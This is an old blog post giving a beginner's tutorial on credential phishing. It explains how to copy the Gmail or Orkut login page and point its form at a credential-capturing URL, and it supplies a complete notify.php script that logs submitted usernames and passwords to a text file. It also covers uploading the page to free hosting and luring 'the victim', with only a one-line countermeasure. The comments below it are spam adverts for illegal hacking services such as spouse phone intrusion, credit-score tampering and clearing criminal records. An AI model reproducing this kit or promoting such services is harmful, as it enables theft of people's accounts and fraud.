Thursday, July 21, 2011

Phishing(Basic Level)

What is Phishing?

Phishing is a technique to obtain password,username or any sensetive information like Credit card details using a fake page which pretends to be a real one.


How to perform the attack?

Method-1:Directing the username and password to your email Id

1.First You need to create a fake login page.So, how to do it?
Example:-open gmail.com in your browser. In the login page Click Right mouse button and save the page.

2.You must know basic HTML to understand this step: there is a keyword "ACTION" in the HTML code, its task is to send the details of the page to a handler(script), now what we have to do is change the value of that "ACTION" in the form. Lets see how to do it.
Example:-Open the saved login page(gmail.com in our example) with Notepad->press "ctrl+f"(find mode)->type "action" keyword to find.
Now you have located the "action", change the code: inside the two immediate double quotes, replace the code with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email id.
note:-the "link" in the above url is used to direct the page again to gmail.com, you can change it as per your need.

3.Now try login and check if you are getting the email or not. If everything is working good, now its time to upload these login pages. To do so choose any free webhosting sites(eg:my3gb.com): create an account, go to file manager and upload all files and folder which you have saved.

4.Now give the link(say:username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now its upto you how to make your victim login through your fake page(use your head).





Method-2:Storing the username and password in txt file(uploaded in website)

1.First You need to create a fake login page.So, how to do it?
Example:-open orkut.com in your browser. In the login page Click Right mouse button and save the page.

2.Now create notify.php file.(copy and paste the below code and save it with name notify.php)



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3.Now create an empty store.txt file.

4.Open the login page saved earlier with notepad and find "action" word(hint:press "ctrl+f"). Change the value(inside two immediate double quotes) of action to "notify.php"
i.e. after submitting the login form will be handled by notify.php which will further redirect the page to orkut.com, check the header section of the php code, you can change it as per your need.









5.Upload all files(fake login page with folder,notify.php and store.txt) to my3gb.com(or any free hosting site).

 6. Serve your fake login page link to the victim. Once the victim login through your page, the login details will be stored in "store.txt" so don't forget to check the store.txt file.


Countermeasuers:

The only possible countermeasure is just don't enter the confidential data without checking the URL of the website. There are some other phishing attacks in which URL can be spoofed so better check the certificate of the website.

4 comments:

  1. When you need a great hacker that's reliable and trustworthy and cost effective,in WORLDHACKERS79@GMAIL.COM you got the best hacker in town to hack into any devices of your choice.
    this is the only hacker that's reliable,tested and trusted,they'll deliver your work in 6hours and hack into any devices of your spouse without installing anything on the target's phone and with no physical contact on your spouse's phone.
    thanks for the good work from
    Worldhackers79@gmail.com

    ReplyDelete
  2. On behalf of my family we want to say a big thank you to Kenny Blackhat, i have been thinking on how to show my appreciation for the assistance you did offered for the credit score job... We've got 440 and was seeking credit repair on how to increase the points up to 700+ in order to live a comfy way. I saw some russian students he worked for recommendation on this forum and i contacted kenny for the hacking job, he did explain and advice on how he was gonna alter these various points. Took exactly 5 days to clearly reveal the points, and to our greatest surprise it was actually 750!...I just wanna say a big THANK YOU to you and your team Kenny Group blackhat, in case you're wondering who Kenny blackhat is, he's the real deal on any hacking job you want and related forums. I say well done kenny. kennyblackhat@hackermail. com is the mail and they do have a cell number for other communications at +1 717-388-3985 and i am Mrs Lynn Sisto. thank you again kenny Group Blackhat and may God bless deeply.

    ReplyDelete
  3. CLASSIC CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?

    Strengthen your Cybersecurity stance by contacting CLASSIC CYBER HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the solution you need to have All your Cyber Hack needs met

    We specialize in All type of cyber Jobs such as:

    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.

    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.

    #INSTALLATION of Spy ware so as to spy into someone else's computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.

    #CRACKING into Websites and Data base of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c

    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.

    * We assure you that your Job will be attended to with care and efficiency as it will be done in no delayed time.

    #We also have a forum where you can get yourself equipped with Advanced hacking Knowledge and Also if you're Good with Hacking and you think you can Join our Team of sophisticated hackers, you're welcome as well...
    At CLASSIC CYBER HACKS, we give you the Best service in the Hacking world.
    *We're Classic hackers*
    Write us on:

    *Classiccyberhacks@gmail.com
    *Classiccybernotch@gmail.com

    Signed,
    Collins .A.

    ReplyDelete
  4. "Fake hackers asks for payment before services that they do not still render at the end but I want to introduce you to a university graduate of havard in computer science as well as computer geek for any sort of account,grade,email, credit card, erasing criminal records etc,you name it. She shows proof of work and payment is made only after service well done to your satisfaction Contact her at Jamiehacking99@gmail.com"

    ReplyDelete